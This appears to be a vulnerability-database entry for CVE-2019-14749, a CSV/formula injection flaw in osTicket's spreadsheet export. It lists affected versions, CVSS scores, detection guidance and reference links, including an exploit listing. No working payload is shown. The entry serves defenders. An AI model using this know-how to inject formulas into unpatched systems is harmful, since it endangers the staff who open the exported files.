CVE-2019-14749
published 2019-08-07CVE-2019-14749: An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. CSV (aka Formula) injection exists in the export spreadsheets functionality. These…
PriorityP262high8.8CVSS 3.0
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
9.61%
94.9th percentile
An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. CSV (aka Formula) injection exists in the export spreadsheets functionality. These spreadsheets are generated dynamically from unvalidated or unfiltered user input in the Name and Internal Notes fields in the Users tab, and the Issue Summary field in the tickets tab. This allows other agents to download data in a .csv file format or .xls file format. This is used as input for spreadsheet applications such as Excel and OpenOffice Calc, resulting in a situation where cells in the spreadsheets can contain input from an untrusted source. As a result, the end user who is accessing the exported spreadsheet can be affected.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| osticket | osticket | < 1.10.7 | 1.10.7 |
| osticket | osticket | >= 1.12 < 1.12.1 | 1.12.1 |
Detection & IOCsextracted from sources · hover to see the quote
- →CSV/Formula injection payload inserted into the 'Name' and 'Internal Notes' fields in the Users tab, and the 'Issue Summary' field in the tickets tab of osTicket ↗
- →Monitor osTicket export functionality for downloads of .csv or .xls files containing formula-prefixed cell values (e.g., starting with =, +, -, @) originating from user-controlled fields ↗
- →Non-agent (regular) users can also inject malicious formula payloads via the name-edit feature, not just agents — monitor all user profile update requests for formula injection patterns ↗
- →Review the osTicket patch commit for exact sanitization logic to build input-validation signatures ↗
- ·Vulnerability affects osTicket versions before 1.10.7 and 1.12.x before 1.12.1; exploitation requires an authenticated session (agent or regular user) to inject payloads, and a separate agent to trigger execution by exporting the spreadsheet ↗
- ·The formula payload is only executed client-side when the exported .csv or .xls file is opened in a spreadsheet application (e.g., Excel, OpenOffice Calc) — the server itself is not directly compromised; the end user opening the file is the victim ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/154004/osTicket-1.12-Formula-Injection.htmlhttps://github.com/osTicket/osTicket/commit/99818486c5b1d8aa445cee232825418d6834f249https://github.com/osTicket/osTicket/releases/tag/v1.10.7https://github.com/osTicket/osTicket/releases/tag/v1.12.1https://www.exploit-db.com/exploits/47225http://packetstormsecurity.com/files/154004/osTicket-1.12-Formula-Injection.htmlhttps://github.com/osTicket/osTicket/commit/99818486c5b1d8aa445cee232825418d6834f249https://github.com/osTicket/osTicket/releases/tag/v1.10.7https://github.com/osTicket/osTicket/releases/tag/v1.12.1https://www.exploit-db.com/exploits/47225
2019-08-07
Published